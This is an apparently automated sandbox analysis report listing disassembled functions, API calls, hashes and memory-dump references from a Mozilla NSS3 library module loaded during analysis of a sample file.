API ID: Util$Error$Alloc_ArenaCopyFindHashItem_LookupTable$ConstEqual_ExtensionItems
String ID:
API String ID: 3193526912-0
Opcode ID: ebf86faa50ffcf2ec35f4368ae81f486fcdccb540a5d46777f353d11653d57bb
Instruction ID: 7a3535b2e8c19a4e469d27aa829d2dd39426ccb2f482e547053d84a4aeb45f36
Opcode Fuzzy Hash: ebf86faa50ffcf2ec35f4368ae81f486fcdccb540a5d46777f353d11653d57bb
Instruction Fuzzy Hash: 4821D6737016109BEB10CEE9AE44B7737A89F4D658F140878BD15CBB41E721E904E6A1

Uniqueness

Uniqueness Score: -1.00%

Function 6C7EE5E0 Relevance: 7.6, APIs: 5, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,00000000,00000000,00000000,?,6C7EE755,00000000,00000004,?,?), ref: 6C7EE5F5

Part of subcall function 6C8414C0: TlsGetValue.KERNEL32 ref: 6C8414E0
Part of subcall function 6C8414C0: EnterCriticalSection.KERNEL32 ref: 6C8414F5
Part of subcall function 6C8414C0: PR_Unlock.NSS3 ref: 6C84150D

PR_SetError.NSS3(FFFFE005,00000000,?), ref: 6C7EE62C
SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000000,?), ref: 6C7EE63E

Part of subcall function 6C83F9A0: PORT_ArenaMark_Util.NSS3(?,00000000,-00000002,?,-00000002,?,6C7DF379,?,00000000,-00000002), ref: 6C83F9B7

PK11_HashBuf.NSS3(?,?,?,?,?,?,?,?), ref: 6C7EE65C

Part of subcall function 6C80DDD0: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C80DDEC
Part of subcall function 6C80DDD0: PK11_DigestBegin.NSS3(00000000), ref: 6C80DE70
Part of subcall function 6C80DDD0: PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6C80DE83
Part of subcall function 6C80DDD0: HASH_ResultLenByOidTag.NSS3(?), ref: 6C80DE95
Part of subcall function 6C80DDD0: PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6C80DEAE
Part of subcall function 6C80DDD0: PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C80DEBB

SECITEM_ZfreeItem_Util.NSS3(00000000,00000000,?), ref: 6C7EE68E

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: K11_Util$Digest$ArenaItem_Mark_$AllocBeginContextCriticalDestroyEnterErrorFinalFindHashResultSectionTag_UnlockValueZfree
String ID:
API String ID: 2865137721-0
Opcode ID: a3a89b2af733e35b5063d925a0347e14bcb9d919b36c9b216162f5a6fb2f6e13
Instruction ID: 91faa93b139b0a7d5fc8a5648ee4984f233c808d4683368439dca1c32e32600d
Opcode Fuzzy Hash: a3a89b2af733e35b5063d925a0347e14bcb9d919b36c9b216162f5a6fb2f6e13
Instruction Fuzzy Hash: 33214377B022196FFB004EA8DE80F6B77A89F88258F154938ED1C87A51EB21DD24C3D0

Uniqueness

Uniqueness Score: -1.00%

Function 6C7EAD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,6C7E3FFF,00000000,?,?,?,?,?,6C7E1A1C,00000000,00000000), ref: 6C7EADA7

Part of subcall function 6C8414C0: TlsGetValue.KERNEL32 ref: 6C8414E0
Part of subcall function 6C8414C0: EnterCriticalSection.KERNEL32 ref: 6C8414F5
Part of subcall function 6C8414C0: PR_Unlock.NSS3 ref: 6C84150D

PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C7E3FFF,00000000,?,?,?,?,?,6C7E1A1C,00000000,00000000), ref: 6C7EADB4

Part of subcall function 6C8410C0: TlsGetValue.KERNEL32(?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C8410F3
Part of subcall function 6C8410C0: EnterCriticalSection.KERNEL32(?,?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C84110C
Part of subcall function 6C8410C0: PL_ArenaAllocate.NSS3(?,?,?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C841141
Part of subcall function 6C8410C0: PR_Unlock.NSS3(?,?,?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C841182
Part of subcall function 6C8410C0: TlsGetValue.KERNEL32(?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C84119C

SECITEM_CopyItem_Util.NSS3(00000000,?,6C7E3FFF,?,?,?,?,6C7E3FFF,00000000,?,?,?,?,?,6C7E1A1C,00000000), ref: 6C7EADD5

Part of subcall function 6C83FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C838D2D,?,00000000,?), ref: 6C83FB85
Part of subcall function 6C83FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C83FBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C9094B0,?,?,?,?,?,?,?,?,6C7E3FFF,00000000,?), ref: 6C7EADEC

Part of subcall function 6C83B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C9118D0,?), ref: 6C83B095

PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C7E3FFF), ref: 6C7EAE3C

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
String ID:
API String ID: 2372449006-0
Opcode ID: 4a50fa721f1e747e6283dc5987a2d8e0a10bb028462669b54f26702a6ce511ab
Instruction ID: 0dcc76c545fb608e5041fb85d8afcaa27c88268234f0385141fddf45fc55a8ce
Opcode Fuzzy Hash: 4a50fa721f1e747e6283dc5987a2d8e0a10bb028462669b54f26702a6ce511ab
Instruction Fuzzy Hash: DE117B72E002195BE7209B699E41BBF77BCDF9525CF004A38EC1986741F760E96882E2

Uniqueness

Uniqueness Score: -1.00%

Function 6C808E80 Relevance: 7.6, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,?,6C822E62,?,?,?,?,?,?,?,00000000,?,?,?,6C7F4F1C), ref: 6C808EA2

Part of subcall function 6C82F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C82F854
Part of subcall function 6C82F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C82F868
Part of subcall function 6C82F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C82F882
Part of subcall function 6C82F820: free.MOZGLUE(04C483FF,?,?), ref: 6C82F889
Part of subcall function 6C82F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C82F8A4
Part of subcall function 6C82F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C82F8AB
Part of subcall function 6C82F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C82F8C9
Part of subcall function 6C82F820: free.MOZGLUE(280F10EC,?,?), ref: 6C82F8D0

PK11_IsLoggedIn.NSS3(?,?,?,6C822E62,?,?,?,?,?,?,?,00000000,?,?,?,6C7F4F1C), ref: 6C808EC3
TlsGetValue.KERNEL32(?,?,?,6C822E62,?,?,?,?,?,?,?,00000000,?,?,?,6C7F4F1C), ref: 6C808EDC
EnterCriticalSection.KERNEL32(?,?,?,?,6C822E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6C808EF1
PR_Unlock.NSS3 ref: 6C808F20

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
String ID:
API String ID: 1978757487-0
Opcode ID: fe1528c48c48fa1f2426856be0d7f00a604febb88a11f4c0735defe17e212fc3
Instruction ID: d8e1178edd3b2f77c2ccc1cc711356eaf6bc91144d7f5525e5123f276ea00b80
Opcode Fuzzy Hash: fe1528c48c48fa1f2426856be0d7f00a604febb88a11f4c0735defe17e212fc3
Instruction Fuzzy Hash: E4218D71A096159FC710AF39DA8459ABBF0FF48318F01496EEC989BB41D730E894CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 6C8426A0 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

_NSSUTIL_GetSecmodName.NSS3(?,?,?,?,?), ref: 6C8426DD

Part of subcall function 6C845DE0: isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?), ref: 6C845E08
Part of subcall function 6C845DE0: NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C845E3F
Part of subcall function 6C845DE0: PL_strncasecmp.NSS3(00000000,readOnly,00000008), ref: 6C845E5C
Part of subcall function 6C845DE0: free.MOZGLUE(00000000), ref: 6C845E7E
Part of subcall function 6C845DE0: free.MOZGLUE(00000000), ref: 6C845E97
Part of subcall function 6C845DE0: PORT_Strdup_Util.NSS3(secmod.db), ref: 6C845EA5
Part of subcall function 6C845DE0: _NSSUTIL_EvaluateConfigDir.NSS3(00000000,?,?), ref: 6C845EBB
Part of subcall function 6C845DE0: NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C845ECB
Part of subcall function 6C845DE0: PL_strncasecmp.NSS3(00000000,noModDB,00000007), ref: 6C845EF0

PR_SetError.NSS3(FFFFE0B1,00000000), ref: 6C8426F8

Part of subcall function 6C88C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C88C2BF

free.MOZGLUE(00000000), ref: 6C843434
free.MOZGLUE(?), ref: 6C843448
free.MOZGLUE(?), ref: 6C84345C

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: free$Value$L_strncasecmpParam$ConfigErrorEvaluateNameSecmodStrdup_Utilisspace
String ID:
API String ID: 3127463018-0
Opcode ID: b1dcf4e88adcbf1a41961bcd0bc73833992a74cddcd6aaa5e7123f8c44539bd8
Instruction ID: 8541ff8dea7580288ec6169930f234f7dd52f62e2680012e079dbf4e8e97a0ec
Opcode Fuzzy Hash: b1dcf4e88adcbf1a41961bcd0bc73833992a74cddcd6aaa5e7123f8c44539bd8
Instruction Fuzzy Hash: 5711D2B1A0011C9BDF21DF68DC85ADA73B8FF02354F148979E859D7640EB31DA04CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C8704C0 Relevance: 7.6, APIs: 5, Instructions: 63synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(ED850FC0,000000FF,?,00000000,?,6C87461B,-00000004), ref: 6C8704DF
TlsGetValue.KERNEL32(?,00000000,?,6C87461B,-00000004), ref: 6C870510
EnterCriticalSection.KERNEL32(ED850FDC), ref: 6C870520
PR_SetError.NSS3(FFFFE89D,00000000,?,00000000,?,6C87461B,-00000004), ref: 6C870534
GetLastError.KERNEL32(?,6C87461B,-00000004), ref: 6C870543

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Error$CriticalEnterLastObjectSectionSingleValueWait
String ID:
API String ID: 3052423345-0
Opcode ID: cc2b6484d0592d4c983369c43ef5f9696e693f0bed4afa379a7d68eb6314f90b
Instruction ID: c7146e748f75ecb026282d2a3ab6b22d97f2542e20453e3c1cf15c11f2bb8d09
Opcode Fuzzy Hash: cc2b6484d0592d4c983369c43ef5f9696e693f0bed4afa379a7d68eb6314f90b
Instruction Fuzzy Hash: 5E112771A085555BDF306A389E08B6D76A4EF0231DF704E24E42DE7990FB32D584CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 6C80CD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 6C821E10: TlsGetValue.KERNEL32 ref: 6C821E36
Part of subcall function 6C821E10: EnterCriticalSection.KERNEL32(?,?,?,6C7FB1EE,2404110F,?,?), ref: 6C821E4B
Part of subcall function 6C821E10: PR_Unlock.NSS3 ref: 6C821E76

free.MOZGLUE(?,6C80D079,00000000,00000001), ref: 6C80CDA5
PK11_FreeSymKey.NSS3(?,6C80D079,00000000,00000001), ref: 6C80CDB6
SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C80D079,00000000,00000001), ref: 6C80CDCF
DeleteCriticalSection.KERNEL32(?,6C80D079,00000000,00000001), ref: 6C80CDE2
free.MOZGLUE(?), ref: 6C80CDE9

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
String ID:
API String ID: 1720798025-0
Opcode ID: 4d800760476bf4add3a573b32495ba9fdc19d62076d57ed509b32cb509ed74b3
Instruction ID: c9c6e9b889d487a0e0e1636a4e841fbc4e3c8825e707495c4b1d75f88d5c541a
Opcode Fuzzy Hash: 4d800760476bf4add3a573b32495ba9fdc19d62076d57ed509b32cb509ed74b3
Instruction Fuzzy Hash: AD11C6B2B01525ABDF20AE65ED44996B73DFF04259B100931ED09D7E02D732E864C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 6C872CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C875B40: PR_GetIdentitiesLayer.NSS3 ref: 6C875B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C872CEC

Part of subcall function 6C88C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C88C2BF

PR_EnterMonitor.NSS3(?), ref: 6C872D02
PR_EnterMonitor.NSS3(?), ref: 6C872D1F
PR_ExitMonitor.NSS3(?), ref: 6C872D42
PR_ExitMonitor.NSS3(?), ref: 6C872D5B

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction ID: 55dad7eb4966e096e17fbd88510784d95b41a5b0347c0a4d4ac6917fca9f17fb
Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction Fuzzy Hash: 0401C8B19046049FE7309E6AFE40BCBBBA1EF45359F004D35E85986710F736F41587A2

Uniqueness

Uniqueness Score: -1.00%

Function 6C872D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C875B40: PR_GetIdentitiesLayer.NSS3 ref: 6C875B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C872D9C

Part of subcall function 6C88C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C88C2BF

PR_EnterMonitor.NSS3(?), ref: 6C872DB2
PR_EnterMonitor.NSS3(?), ref: 6C872DCF
PR_ExitMonitor.NSS3(?), ref: 6C872DF2
PR_ExitMonitor.NSS3(?), ref: 6C872E0B

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction ID: aba642727888e59746efd9887b0fbba2688f4e05a71fb48e62c34c002cb2cca0
Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction Fuzzy Hash: 7001C8B29046049FE7309E69FE41BCBB7A1EF41358F000D35E85986B11E736F81586A2

Uniqueness

Uniqueness Score: -1.00%

Function 6C80AE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 6C7F3090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C80AE42), ref: 6C7F30AA
Part of subcall function 6C7F3090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7F30C7
Part of subcall function 6C7F3090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C7F30E5
Part of subcall function 6C7F3090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7F3116
Part of subcall function 6C7F3090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C7F312B
Part of subcall function 6C7F3090: PK11_DestroyObject.NSS3(?,?), ref: 6C7F3154
Part of subcall function 6C7F3090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7F317E

SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6C7E99FF,?,?,?,?,?,?,?,?,?,6C7E2D6B,?), ref: 6C80AE67
SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6C7E99FF,?,?,?,?,?,?,?,?,?,6C7E2D6B,?), ref: 6C80AE7E
SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C7E2D6B,?,?,00000000), ref: 6C80AE89
PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6C7E2D6B,?,?,00000000), ref: 6C80AE96
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6C7E2D6B,?,?), ref: 6C80AEA3

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
String ID:
API String ID: 754562246-0
Opcode ID: 4ad492c768674b2c1855cd1226a85b804e683d0c551e127353379f2a134d3924
Instruction ID: 18875495a52faf937408fb5cc0d04c5516d1fdc8258491269960252b59596fec
Opcode Fuzzy Hash: 4ad492c768674b2c1855cd1226a85b804e683d0c551e127353379f2a134d3924
Instruction Fuzzy Hash: A101F472B1442457E721A16CEEC9AEF31588F9765CF080831E809D7B01F611E90542E3

Uniqueness

Uniqueness Score: -1.00%

Function 6C8FADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6C8FA6D8), ref: 6C8FAE0D
free.MOZGLUE(?), ref: 6C8FAE14
DeleteCriticalSection.KERNEL32(6C8FA6D8), ref: 6C8FAE36
free.MOZGLUE(?), ref: 6C8FAE3D
free.MOZGLUE(00000000,00000000,?,?,6C8FA6D8), ref: 6C8FAE47

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: 3716b7ec0834a51296b48eb7fe85d96abbb7672448ce4e5d8befa38c78be9456
Instruction ID: 29a4f581eb25be6323b3dc612bede17de2b6d41e9e2179afb9604ecaba1da2da
Opcode Fuzzy Hash: 3716b7ec0834a51296b48eb7fe85d96abbb7672448ce4e5d8befa38c78be9456
Instruction Fuzzy Hash: 26F096B6201E15ABCF209F68D8089577778BF867B57240328E53EC3940D731E516D7D5

Uniqueness

Uniqueness Score: -1.00%

Function 6C776C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C776D36

Strings

%s at line %d of [%.10s], xrefs: 6C776D2F
database corruption, xrefs: 6C776D2A
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C776D20

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 12e463d8c1ff7411242c2156f5cbef6f90435cfcb32452e8a83dea0eafda2984
Instruction ID: 709f242eee60381dda92d2f94d3b2bc392e163ad221015d2702f433b3d3f3bb8
Opcode Fuzzy Hash: 12e463d8c1ff7411242c2156f5cbef6f90435cfcb32452e8a83dea0eafda2984
Instruction Fuzzy Hash: 3821E2706143099BCF20CE1ACB46B5AB7F2AF84318F144528DC499BF55E371FA4887A1

Uniqueness

Uniqueness Score: -1.00%

Function 6C8ACC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6C8ACD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C8ACC7B), ref: 6C8ACD7A
Part of subcall function 6C8ACD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C8ACD8E
Part of subcall function 6C8ACD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C8ACDA5
Part of subcall function 6C8ACD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C8ACDB8

